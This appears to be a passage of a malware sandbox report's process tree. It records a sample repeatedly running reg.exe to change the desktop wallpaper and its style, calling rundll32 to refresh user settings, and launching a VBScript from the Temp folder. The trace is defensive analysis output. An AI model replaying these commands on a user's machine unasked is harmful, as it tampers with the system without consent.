C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4284
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3928
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4552
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4664
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4468
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:812
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4508
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3116
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1080
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3256
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1416
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1544
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3636
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:1500
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4664
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3476
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:5056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4512
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3808
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1544
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3896
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4468
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4244
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3580
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:1104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3256
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:812
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4512
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:812
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4328
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:812
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:4328
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5140
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5168
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5184
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5208
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5220
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5232
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5248
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5264
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5284
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5308
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5324
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5336
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5364
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5404
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5428
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5456
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5472
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5492
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5512
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5528
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5556
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5572
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5588
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5620
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5648
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5660
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5688
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5700
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5712
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5740
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5768
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5780
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5792
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5804
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5832
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5872
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5884
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5896
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5924
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5932
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5956
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5976
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5988
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6016
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6068
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6080
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6112
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6124
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5148
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5160
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5208
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5244
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5256
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5304
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5284
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5324
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5416
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5440
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5516
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5536
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5552
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5576
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5640
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5672
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5696
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5708
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5712
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5736
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5780
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5820
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5880
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5916
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5964
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5988
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6000
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6080
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5152
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5184
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5288
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5320
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5332
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5420
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5428
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5592
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5628
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5688
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5708
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5736
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5800
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5920
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6076
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5188
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5260
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5248
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5344
-
-
